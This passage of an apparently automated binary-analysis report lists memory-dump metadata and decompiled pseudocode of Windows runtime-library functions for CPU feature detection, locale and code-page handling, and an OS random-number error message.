                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                    • String ID:
                    • API String ID: 745075371-0
                    • Opcode ID: 01b6e1f6bbfa966b0d76421174583699c18c1fdac3422c599aafd2fa13588d5b
                    • Instruction ID: 47025c51da060e300029977a28076e2bddd8c1f422b73694748a101e332d34b2
                    • Opcode Fuzzy Hash: 01b6e1f6bbfa966b0d76421174583699c18c1fdac3422c599aafd2fa13588d5b
                    • Instruction Fuzzy Hash: 445172719002169BEB32DFAACC40ABB77B8BF55700F14447BEA15D72E0E77099498BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E013EFE10(intOrPtr __edx, void* __ebp) {
                    				signed int _v4;
                    				signed int _v8;
                    				signed int _v12;
                    				unsigned int _v16;
                    				signed int _v20;
                    				signed char _v24;
                    				intOrPtr _v28;
                    				intOrPtr _v32;
                    				signed char _v36;
                    				signed int _v40;
                    				signed char _v44;
                    				unsigned int _v48;
                    				void* _v52;
                    				signed int _t83;
                    				char _t87;
                    				intOrPtr _t88;
                    				signed int _t93;
                    				intOrPtr _t116;
                    				signed int _t119;
                    				unsigned int _t126;
                    				unsigned int _t132;
                    				intOrPtr _t135;
                    				intOrPtr* _t136;
                    				intOrPtr* _t137;
                    				intOrPtr* _t138;
                    				intOrPtr* _t139;
                    				signed int _t140;
                    				intOrPtr* _t142;
                    				intOrPtr* _t143;
                    
                    				_t135 = __edx;
                    				_t146 =  &_v52;
                    				_t83 =  *0x1435234; // 0x78d9f939
                    				_v4 = _t83 ^  &_v52;
                    				_v36 = 0;
                    				_v24 = 0;
                    				asm("cpuid");
                    				_t138 =  &_v36;
                    				_v8 = 0;
                    				asm("xorps xmm0, xmm0");
                    				_v20 = 0;
                    				asm("movq [esp+0x20], xmm0");
                    				 *_t138 = 0;
                    				 *((intOrPtr*)(_t138 + 4)) = _t116;
                    				 *((intOrPtr*)(_t138 + 8)) = 0;
                    				asm("movq [esp+0x30], xmm0");
                    				 *((intOrPtr*)(_t138 + 0xc)) = __edx;
                    				_t139 =  &_v20;
                    				asm("cpuid");
                    				 *_t139 = 1;
                    				 *((intOrPtr*)(_t139 + 4)) = _t116;
                    				 *((intOrPtr*)(_t139 + 8)) = 0;
                    				 *((intOrPtr*)(_t139 + 0xc)) = __edx;
                    				_t119 = _v12;
                    				_v52 = 0;
                    				asm("movq [esp+0x10], xmm0");
                    				_v40 = 0;
                    				if((_v8 & 0x04000000) == 0) {
                    					_t87 =  *0x1439b09; // 0x1
                    					if(_t87 == 0) {
                    						L7:
                    						 *0x1439b0a = 0;
                    						L8:
                    						if(_t87 == 0) {
                    							L10:
                    							 *0x1439b0b = 0;
                    							L11:
                    							if(_t87 == 0) {
                    								L13:
                    								 *0x1439b0c = 0;
                    								L14:
                    								if(_t87 == 0) {
                    									L16:
                    									 *0x1439b0d = 0;
                    									L17:
                    									if(_t87 == 0) {
                    										L19:
                    										 *0x1439b0e = 0;
                    										L20:
                    										_t88 = _v32;
                    										if(_t88 != 0x756e6547) {
                    											if(_t88 != 0x68747541) {
                    												if(_t88 == 0x746e6543 && _v28 == 0x736c7561 && _v24 == 0x48727561) {
                    													_t142 =  &_v52;
                    													asm("cpuid");
                    													 *_t142 = 0xc0000000;
                    													 *((intOrPtr*)(_t142 + 4)) = _t116;
                    													 *((intOrPtr*)(_t142 + 8)) = 0;
                    													 *((intOrPtr*)(_t142 + 0xc)) = _t135;
                    													if(_v52 >= 0xc0000001) {
                    														asm("cpuid");
                    														 *_t142 = 0xc0000001;
                    														 *((intOrPtr*)(_t142 + 4)) = _t116;
                    														 *((intOrPtr*)(_t142 + 8)) = 0;
                    														 *((intOrPtr*)(_t142 + 0xc)) = _t135;
                    														_t93 = _v40;
                    														 *0x1439b14 = (_v40 & 0x0000000c) != 0;
                    														 *0x1439b15 = (_v40 & 0x000000c0) != 0;
                    														 *0x1439b16 = (_t93 & 0x00000300) != 0;
                    														 *0x1439b17 = (_t93 & 0x00000c00) != 0;
                    														 *0x1439b18 = (_t93 & 0x00003000) != 0;
                    													}
                    												}
                    												L35:
                    												_t140 =  *0x1435198; // 0x40
                    												L36:
                    												_t141 =  ==  ? 0x20 : _t140;
                    												 *0x1435198 =  ==  ? 0x20 : _t140;
                    												 *0x1439b08 = 1;
                    												return E013F268B(0x20, _v4 ^ _t146);
                    											}
                    											if(_v28 != 0x444d4163 || _v24 != 0x69746e65) {
                    												goto L35;
                    											} else {
                    												_t143 =  &_v52;
                    												asm("cpuid");
                    												 *_t143 = 0x80000005;
                    												 *((intOrPtr*)(_t143 + 4)) = _t116;
                    												 *((intOrPtr*)(_t143 + 8)) = 0;
                    												 *((intOrPtr*)(_t143 + 0xc)) = _t135;
                    												_t140 = _v44 & 0x000000ff;
                    												 *0x1439b12 = _v12 >> 0x0000001e & 0x00000001;
                    												if(_v36 >= 7) {
                    													_t136 =  &_v52;
                    													asm("cpuid");
                    													 *_t136 = 7;
                    													 *((intOrPtr*)(_t136 + 4)) = _t116;
                    													 *((intOrPtr*)(_t136 + 8)) = 0;
                    													 *((intOrPtr*)(_t136 + 0xc)) = _t135;
                    													_t126 = _v48;
                    													 *0x1439b13 = _t126 >> 0x00000012 & 0x00000001;
                    													 *0x1439b10 = _t126 >> 0x00000013 & 0x00000001;
                    													 *0x1439b0f = _t126 >> 0x0000001d & 0x00000001;
                    												}
                    												goto L36;
                    											}
                    										}
                    										if(_v28 != 0x6c65746e || _v24 != 0x49656e69) {
                    											goto L35;
                    										} else {
                    											 *0x1439b11 = (_v20 & 0x00000f00) == 0xf00;
                    											_t140 = (_v16 >> 0x00000008 & 0x000000ff) << 3;
                    											 *0x1439b12 = _t119 >> 0x0000001e & 0x00000001;
                    											if(_v36 >= 7) {
                    												_t137 =  &_v52;
                    												asm("cpuid");
                    												 *_t137 = 7;
                    												 *((intOrPtr*)(_t137 + 4)) = _t116;
                    												 *((intOrPtr*)(_t137 + 8)) = 0;
                    												 *((intOrPtr*)(_t137 + 0xc)) = _t135;
                    												_t132 = _v48;
                    												 *0x1439b13 = _t132 >> 0x00000012 & 0x00000001;
                    												 *0x1439b10 = _t132 >> 0x00000013 & 0x00000001;
                    												 *0x1439b0f = _t132 >> 0x0000001d & 0x00000001;
                    											}
                    											goto L36;
                    										}
                    									}
                    									 *0x1439b0e = 1;
                    									if((_v12 & 0x00000002) != 0) {
                    										goto L20;
                    									}
                    									goto L19;
                    								}
                    								 *0x1439b0d = 1;
                    								if((_t119 & 0x02000000) != 0) {
                    									goto L17;
                    								}
                    								goto L16;
                    							}
                    							 *0x1439b0c = 1;
                    							if((_t119 & 0x00100000) != 0) {
                    								goto L14;
                    							}
                    							goto L13;
                    						}
                    						 *0x1439b0b = 1;
                    						if((_t119 & 0x00080000) != 0) {
                    							goto L11;
                    						}
                    						goto L10;
                    					}
                    					L6:
                    					 *0x1439b0a = 1;
                    					if((_t119 & 0x00000200) != 0) {
                    						goto L8;
                    					}
                    					goto L7;
                    				}
                    				if((_t119 & 0x08000000) != 0) {
                    					L4:
                    					_t87 = 1;
                    					 *0x1439b09 = 1;
                    					goto L6;
                    				}
                    				_t87 = E013F0D90();
                    				_t119 = _v12;
                    				if(_t87 != 0) {
                    					goto L4;
                    				} else {
                    					 *0x1439b09 = _t87;
                    					goto L7;
                    				}
                    			}

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: Auth$Cent$Genu$auls$aurH
                    • API String ID: 0-1000870855
                    • Opcode ID: eb803e67dc29b1f02d346a894d617daf52a1c432ae2ae556ef6ec4409c0fdf05
                    • Instruction ID: 13ac063979815978b6a12518508ea05529e9e6c322f0f100d12623486d910cbc
                    • Opcode Fuzzy Hash: eb803e67dc29b1f02d346a894d617daf52a1c432ae2ae556ef6ec4409c0fdf05
                    • Instruction Fuzzy Hash: FE91AA715193928EE729CF2DD05435ABFE0BB9530CF84892EE8D993396C3B4E944CB42
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 71%
                    			E0140F4B3(void* __ecx, void* __edx, intOrPtr _a4, signed short* _a8, intOrPtr _a12) {
                    				intOrPtr* _v8;
                    				signed int _v12;
                    				intOrPtr _v40;
                    				signed int _v52;
                    				char _v252;
                    				short _v292;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t34;
                    				short* _t35;
                    				intOrPtr* _t36;
                    				void* _t39;
                    				signed short* _t44;
                    				intOrPtr _t47;
                    				void* _t49;
                    				signed int _t52;
                    				signed int _t58;
                    				signed int _t60;
                    				signed int _t66;
                    				void* _t67;
                    				void* _t70;
                    				void* _t75;
                    				void* _t79;
                    				void* _t85;
                    				intOrPtr _t86;
                    				short* _t88;
                    				void* _t89;
                    				void* _t91;
                    				signed int _t93;
                    				void* _t94;
                    				intOrPtr* _t97;
                    				void* _t111;
                    				void* _t115;
                    				intOrPtr* _t117;
                    				intOrPtr _t120;
                    				signed int* _t121;
                    				intOrPtr* _t124;
                    				signed short _t126;
                    				int _t128;
                    				signed int _t131;
                    				void* _t132;
                    				signed int _t133;
                    
                    				_push(__ecx);
                    				_push(__ecx);
                    				_push(_t85);
                    				_t34 = E01406A01(_t85, __ecx, __edx);
                    				_t86 = _a4;
                    				_t93 = 0;
                    				_v12 = 0;
                    				_t3 = _t34 + 0x50; // 0x50
                    				_t124 = _t3;
                    				_t4 = _t124 + 0x250; // 0x2a0
                    				_t35 = _t4;
                    				 *((intOrPtr*)(_t124 + 8)) = 0;
                    				 *_t35 = 0;
                    				_t6 = _t124 + 4; // 0x54
                    				_t117 = _t6;
                    				_v8 = _t35;
                    				_t36 = _t86 + 0x80;
                    				 *_t124 = _t86;
                    				 *_t117 = _t36;
                    				if( *_t36 != 0) {
                    					E0140F444(0x1429688, 0x16, _t117);
                    					_t132 = _t132 + 0xc;
                    					_t93 = 0;
                    				}
                    				_push(_t124);
                    				if( *((intOrPtr*)( *_t124)) == _t93) {
                    					E0140EDB5(_t86, _t93, _t117, __eflags);
                    					goto L12;
                    				} else {
                    					if( *((intOrPtr*)( *_t117)) == _t93) {
                    						E0140EED8();
                    					} else {
                    						E0140EE3E(_t93);
                    					}
                    					_pop(_t94);
                    					if( *((intOrPtr*)(_t124 + 8)) == 0) {
                    						_t79 = E0140F444(0x1429378, 0x40, _t124);
                    						_t132 = _t132 + 0xc;
                    						if(_t79 != 0) {
                    							_push(_t124);
                    							if( *((intOrPtr*)( *_t117)) == 0) {
                    								E0140EED8();
                    							} else {
                    								E0140EE3E(0);
                    							}
                    							L12:
                    							_pop(_t94);
                    						}
                    					}
                    				}
                    				if( *((intOrPtr*)(_t124 + 8)) == 0) {
                    					L31:
                    					_t39 = 0;
                    					__eflags = 0;
                    					goto L32;
                    				} else {
                    					_t126 = E0140F312(_t94, _t86 + 0x100, _t124);
                    					if(_t126 == 0 || _t126 == 0xfde8 || _t126 == 0xfde9 || IsValidCodePage(_t126 & 0x0000ffff) == 0) {
                    						goto L31;
                    					} else {
                    						_t44 = _a8;
                    						if(_t44 != 0) {
                    							 *_t44 = _t126;
                    						}
                    						_t120 = _a12;
                    						if(_t120 == 0) {
                    							L30:
                    							_t39 = 1;
                    							goto L32;
                    						} else {
                    							_t97 = _v8;
                    							_t15 = _t120 + 0x120; // 0x14051fe
                    							_t88 = _t15;
                    							 *_t88 = 0;
                    							_t115 = _t97 + 2;
                    							do {
                    								_t47 =  *_t97;
                    								_t97 = _t97 + 2;
                    							} while (_t47 != _v12);
                    							_t99 = _t97 - _t115 >> 1;
                    							_push((_t97 - _t115 >> 1) + 1);
                    							_t49 = E0140D9C1(_t97 - _t115 >> 1, _t88, 0x55, _v8);
                    							_t133 = _t132 + 0x10;
                    							_t152 = _t49;
                    							if(_t49 != 0) {
                    								_push(0);
                    								_push(0);
                    								_push(0);
                    								_push(0);
                    								_push(0);
                    								E013FDA8E();
                    								asm("int3");
                    								_t131 = _t133;
                    								_t52 =  *0x1435234; // 0x78d9f939
                    								_v52 = _t52 ^ _t131;
                    								_push(_t88);
                    								_push(_t126);
                    								_push(_t120);
                    								_t89 = E01406A01(_t88, _t99, _t115);
                    								_t121 =  *(E01406A01(_t89, _t99, _t115) + 0x34c);
                    								_t128 = E0140FBC6(_v40);
                    								asm("sbb ecx, ecx");
                    								_t58 = GetLocaleInfoW(_t128, ( ~( *(_t89 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
                    								__eflags = _t58;
                    								if(_t58 != 0) {
                    									_t60 = E0140C591(_t89, _t121, _t128,  *((intOrPtr*)(_t89 + 0x54)),  &_v252);
                    									__eflags = _t60;
                    									if(_t60 == 0) {
                    										_t66 = E0140FCFA(_t128);
                    										__eflags = _t66;
                    										if(_t66 != 0) {
                    											 *_t121 =  *_t121 | 0x00000004;
                    											__eflags =  *_t121;
                    											_t121[2] = _t128;
                    											_t121[1] = _t128;
                    										}
                    									}
                    									_t64 =  !( *_t121 >> 2) & 0x00000001;
                    									__eflags =  !( *_t121 >> 2) & 0x00000001;
                    								} else {
                    									 *_t121 =  *_t121 & _t58;
                    									_t64 = _t58 + 1;
                    								}
                    								__eflags = _v12 ^ _t131;
                    								return E013F268B(_t64, _v12 ^ _t131);
                    							} else {
                    								_t67 = E01406FCE(_t99, _t152, _t88, 0x1001, _t120, 0x40);
                    								_t153 = _t67;
                    								if(_t67 == 0) {
                    									goto L31;
                    								} else {
                    									_t20 = _t120 + 0x80; // 0x140515e
                    									_t91 = _t20;
                    									_t21 = _t120 + 0x120; // 0x14051fe
                    									if(E01406FCE(_t99, _t153, _t21, 0x1002, _t91, 0x40) == 0) {
                    										goto L31;
                    									} else {
                    										_push(0x5f);
                    										_t70 = E014152CB(_t99);
                    										_t111 = _t91;
                    										if(_t70 != 0) {
                    											L28:
                    											_t22 = _t120 + 0x120; // 0x14051fe
                    											if(E01406FCE(_t111, _t156, _t22, 7, _t91, 0x40) == 0) {
                    												goto L31;
                    											} else {
                    												goto L29;
                    											}
                    										} else {
                    											_push(0x2e);
                    											_t75 = E014152CB(_t111);
                    											_t111 = _t91;
                    											_t156 = _t75;
                    											if(_t75 == 0) {
                    												L29:
                    												_t23 = _t120 + 0x100; // 0x14051de
                    												E014142F3(_t111, _t126, _t23, 0x10, 0xa);
                    												goto L30;
                    											} else {
                    												goto L28;
                    											}
                    										}
                    									}
                    								}
                    								L32:
                    								return _t39;
                    							}
                    						}
                    					}
                    				}
                    			}

                    APIs
                      • Part of subcall function 01406A01: GetLastError.KERNEL32(00000000,?,013FEF5F,?,00000000,?,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A05
                      • Part of subcall function 01406A01: _free.LIBCMT ref: 01406A38
                      • Part of subcall function 01406A01: SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A79
                      • Part of subcall function 01406A01: _abort.LIBCMT ref: 01406A7F
                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,014050DE,?,?,?,?,01404B35,?,00000004), ref: 0140F595
                    • _wcschr.LIBVCRUNTIME ref: 0140F625
                    • _wcschr.LIBVCRUNTIME ref: 0140F633
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,014050DE,00000000,014051FE), ref: 0140F6D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                    • String ID:
                    • API String ID: 4212172061-0
                    • Opcode ID: e7844f4f75fb799f473a1588c7438166d8ff4725c052fb12eb8d8a6ea8658d96
                    • Instruction ID: 1202036cb6f526336038572feff129069b67624e691d35c4dcf9e31d1a0f234f
                    • Opcode Fuzzy Hash: e7844f4f75fb799f473a1588c7438166d8ff4725c052fb12eb8d8a6ea8658d96
                    • Instruction Fuzzy Hash: 3561F771500206ABE736AF7BCC45AA777A8EF14710F14043FEA09D72E1EA31E94987A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E0140F89E(void* __ecx, void* __edx, intOrPtr _a4) {
                    				signed int _v8;
                    				short _v248;
                    				signed int _v252;
                    				intOrPtr _v256;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t50;
                    				signed int _t58;
                    				signed int _t67;
                    				signed int _t69;
                    				signed int _t72;
                    				signed int _t73;
                    				intOrPtr _t75;
                    				signed int _t76;
                    				signed int _t83;
                    				signed int _t85;
                    				signed int _t86;
                    				signed int _t88;
                    				intOrPtr _t89;
                    				void* _t90;
                    				void* _t91;
                    				intOrPtr* _t112;
                    				void* _t116;
                    				intOrPtr* _t118;
                    				signed int _t122;
                    				signed int _t123;
                    				signed int _t124;
                    				signed int _t125;
                    				void* _t126;
                    				signed int* _t127;
                    				int _t129;
                    				signed int _t130;
                    				void* _t131;
                    
                    				_t50 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t50 ^ _t130;
                    				_t91 = E01406A01(_t90, __ecx, __edx);
                    				_t127 =  *(E01406A01(_t91, __ecx, __edx) + 0x34c);
                    				_t129 = E0140FBC6(_a4);
                    				asm("sbb ecx, ecx");
                    				if(GetLocaleInfoW(_t129, ( ~( *(_t91 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78) != 0) {
                    					_t58 = E0140C591(_t91, _t127, _t129,  *((intOrPtr*)(_t91 + 0x54)),  &_v248);
                    					_v252 = _v252 & 0x00000000;
                    					__eflags = _t58;
                    					if(_t58 != 0) {
                    						L18:
                    						__eflags = ( *_t127 & 0x00000300) - 0x300;
                    						if(( *_t127 & 0x00000300) == 0x300) {
                    							L39:
                    							_t64 =  !( *_t127 >> 2) & 0x00000001;
                    							__eflags =  !( *_t127 >> 2) & 0x00000001;
                    							L40:
                    							return E013F268B(_t64, _v8 ^ _t130);
                    						}
                    						asm("sbb ecx, ecx");
                    						_t67 = GetLocaleInfoW(_t129, ( ~( *(_t91 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
                    						__eflags = _t67;
                    						if(_t67 != 0) {
                    							_t69 = E0140C591(_t91, _t127, _t129,  *((intOrPtr*)(_t91 + 0x50)),  &_v248);
                    							__eflags = _t69;
                    							if(_t69 != 0) {
                    								__eflags =  *(_t91 + 0x60);
                    								if( *(_t91 + 0x60) != 0) {
                    									goto L39;
                    								}
                    								__eflags =  *(_t91 + 0x5c);
                    								if( *(_t91 + 0x5c) == 0) {
                    									goto L39;
                    								}
                    								_t72 = E0140C591(_t91, _t127, _t129,  *((intOrPtr*)(_t91 + 0x50)),  &_v248);
                    								__eflags = _t72;
                    								if(_t72 != 0) {
                    									goto L39;
                    								}
                    								_push(_t127);
                    								_t73 = E0140FD1E(0, _t129, 0);
                    								__eflags = _t73;
                    								if(_t73 == 0) {
                    									goto L39;
                    								}
                    								 *_t127 =  *_t127 | 0x00000100;
                    								__eflags = _t127[1];
                    								L37:
                    								if(__eflags == 0) {
                    									_t127[1] = _t129;
                    								}
                    								goto L39;
                    							}
                    							 *_t127 =  *_t127 | 0x00000200;
                    							_t122 =  *_t127;
                    							__eflags =  *(_t91 + 0x60) - _t69;
                    							if( *(_t91 + 0x60) == _t69) {
                    								__eflags =  *(_t91 + 0x5c) - _t69;
                    								if( *(_t91 + 0x5c) == _t69) {
                    									goto L23;
                    								}
                    								_t112 =  *((intOrPtr*)(_t91 + 0x50));
                    								_v256 = _t112 + 2;
                    								do {
                    									_t75 =  *_t112;
                    									_t112 = _t112 + 2;
                    									__eflags = _t75 - _v252;
                    								} while (_t75 != _v252);
                    								__eflags = _t112 - _v256 >> 1 -  *(_t91 + 0x5c);
                    								if(_t112 - _v256 >> 1 !=  *(_t91 + 0x5c)) {
                    									_t69 = 0;
                    									goto L23;
                    								}
                    								_push(_t127);
                    								_t76 = E0140FD1E(_t91, _t129, 1);
                    								__eflags = _t76;
                    								if(_t76 == 0) {
                    									goto L39;
                    								}
                    								 *_t127 =  *_t127 | 0x00000100;
                    								_t69 = 0;
                    								L24:
                    								__eflags = _t127[1] - _t69;
                    								goto L37;
                    							}
                    							L23:
                    							_t123 = _t122 | 0x00000100;
                    							__eflags = _t123;
                    							 *_t127 = _t123;
                    							goto L24;
                    						}
                    						 *_t127 = _t67;
                    						L2:
                    						_t64 = 1;
                    						goto L40;
                    					}
                    					asm("sbb eax, eax");
                    					_t83 = GetLocaleInfoW(_t129, ( ~( *(_t91 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
                    					__eflags = _t83;
                    					if(_t83 == 0) {
                    						goto L1;
                    					}
                    					_t85 = E0140C591(_t91, _t127, _t129,  *((intOrPtr*)(_t91 + 0x50)),  &_v248);
                    					_pop(_t116);
                    					__eflags = _t85;
                    					if(_t85 != 0) {
                    						__eflags =  *_t127 & 0x00000002;
                    						if(( *_t127 & 0x00000002) != 0) {
                    							goto L18;
                    						}
                    						__eflags =  *(_t91 + 0x5c);
                    						if( *(_t91 + 0x5c) == 0) {
                    							L14:
                    							_t124 =  *_t127;
                    							__eflags = _t124 & 0x00000001;
                    							if((_t124 & 0x00000001) != 0) {
                    								goto L18;
                    							}
                    							_t86 = E0140FCFA(_t129);
                    							__eflags = _t86;
                    							if(_t86 == 0) {
                    								goto L18;
                    							}
                    							_t125 = _t124 | 0x00000001;
                    							__eflags = _t125;
                    							 *_t127 = _t125;
                    							goto L17;
                    						}
                    						_t88 = E0141143C(_t91, _t116, _t129,  *((intOrPtr*)(_t91 + 0x50)),  &_v248,  *(_t91 + 0x5c));
                    						_t131 = _t131 + 0xc;
                    						__eflags = _t88;
                    						if(_t88 != 0) {
                    							goto L14;
                    						}
                    						 *_t127 =  *_t127 | 0x00000002;
                    						__eflags =  *_t127;
                    						_t127[2] = _t129;
                    						_t118 =  *((intOrPtr*)(_t91 + 0x50));
                    						_t126 = _t118 + 2;
                    						do {
                    							_t89 =  *_t118;
                    							_t118 = _t118 + 2;
                    							__eflags = _t89 - _v252;
                    						} while (_t89 != _v252);
                    						__eflags = _t118 - _t126 >> 1 -  *(_t91 + 0x5c);
                    						if(_t118 - _t126 >> 1 ==  *(_t91 + 0x5c)) {
                    							_t127[1] = _t129;
                    						}
                    					} else {
                    						 *_t127 =  *_t127 | 0x00000304;
                    						_t127[1] = _t129;
                    						L17:
                    						_t127[2] = _t129;
                    					}
                    					goto L18;
                    				}
                    				L1:
                    				 *_t127 =  *_t127 & 0x00000000;
                    				goto L2;
                    			}

                    APIs
                      • Part of subcall function 01406A01: GetLastError.KERNEL32(00000000,?,013FEF5F,?,00000000,?,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A05
                      • Part of subcall function 01406A01: _free.LIBCMT ref: 01406A38
                      • Part of subcall function 01406A01: SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A79
                      • Part of subcall function 01406A01: _abort.LIBCMT ref: 01406A7F
                      • Part of subcall function 01406A01: _free.LIBCMT ref: 01406A60
                      • Part of subcall function 01406A01: SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A6D
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0140F8F2
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0140F943
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0140FA03
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorInfoLastLocale$_free$_abort
                    • String ID:
                    • API String ID: 2829624132-0
                    • Opcode ID: d0c2925cecc7ae716b1eaf5e2c2332e0d7329bc6de3b7e476753e6f885db2ebc
                    • Instruction ID: 274071e7d0086bf16d1795b4e42d7d230a0b1c174b31bc7af2acc33759c2acb3
                    • Opcode Fuzzy Hash: d0c2925cecc7ae716b1eaf5e2c2332e0d7329bc6de3b7e476753e6f885db2ebc
                    • Instruction Fuzzy Hash: 6461A371540217ABEB3A9F2AC881BBA77A8EF04300F1041BBDD06C66E5E7749999CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 33%
                    			E013EA130(intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
                    				char _v8;
                    				char _v16;
                    				signed int _v20;
                    				intOrPtr _v24;
                    				char _v28;
                    				char _v44;
                    				intOrPtr _v48;
                    				char _v52;
                    				char _v68;
                    				intOrPtr _v72;
                    				char _v76;
                    				char _v92;
                    				intOrPtr _v96;
                    				char _v100;
                    				char _v116;
                    				intOrPtr _v120;
                    				char _v140;
                    				intOrPtr* _v144;
                    				intOrPtr* _v148;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				signed int _t50;
                    				signed int _t51;
                    				void* _t55;
                    				void* _t57;
                    				void* _t59;
                    				void* _t61;
                    				void* _t63;
                    				intOrPtr _t65;
                    				intOrPtr _t66;
                    				intOrPtr _t67;
                    				intOrPtr _t68;
                    				intOrPtr* _t81;
                    				char* _t84;
                    				intOrPtr _t85;
                    				void* _t96;
                    				signed int _t103;
                    
                    				_t83 = __ecx;
                    				_push(0xffffffff);
                    				_push(E01417CB6);
                    				_push( *[fs:0x0]);
                    				_t50 =  *0x1435234; // 0x78d9f939
                    				_t51 = _t50 ^ _t103;
                    				_v20 = _t51;
                    				_push(_t51);
                    				 *[fs:0x0] =  &_v16;
                    				_t81 = __ecx;
                    				_v144 = __ecx;
                    				_v148 = __ecx;
                    				_t55 = E013E9DA0( &_v140, GetLastError(), 0x10);
                    				_push(_a4);
                    				_v8 = 0;
                    				_push("OS_Rng: ");
                    				_push( &_v116);
                    				_t57 = E013C1E24(_t96);
                    				_v8 = 1;
                    				_t59 = E013C1DF7(_t81, _t83, _t96,  &_v92, _t57, " operation failed with error ");
                    				_v8 = 2;
                    				_t61 = E013C1DF7(_t81, _t83, _t96,  &_v68, _t59, 0x141de1c);
                    				_v8 = 3;
                    				_t63 = E013C1DA9(_t81, _t83, _t55,  &_v44, _t61, _t55);
                    				asm("xorps xmm0, xmm0");
                    				asm("movq [ebx+0x4], xmm0");
                    				_t84 = _t81 + 0x10;
                    				 *_t81 = 0x141a7b8;
                    				 *((intOrPtr*)(_t81 + 0xc)) = 6;
                    				 *((intOrPtr*)(_t84 + 0x14)) = 0xf;
                    				 *((intOrPtr*)(_t84 + 0x10)) = 0;
                    				_v8 = 5;
                    				 *_t84 = 0;
                    				E013C63D3(_t84, _t96, _t63, 0, 0xffffffff);
                    				_t65 = _v24;
                    				if(_t65 >= 0x10) {
                    					_push(_t65 + 1);
                    					_push(_v44);
                    					E013CAAE0(_t81, _t96);
                    				}
                    				_t66 = _v48;
                    				_v24 = 0xf;
                    				_v28 = 0;
                    				_v44 = 0;
                    				if(_t66 >= 0x10) {
                    					_push(_t66 + 1);
                    					_push(_v68);
                    					E013CAAE0(_t81, _t96);
                    				}
                    				_t67 = _v72;
                    				_v48 = 0xf;
                    				_v52 = 0;
                    				_v68 = 0;
                    				if(_t67 >= 0x10) {
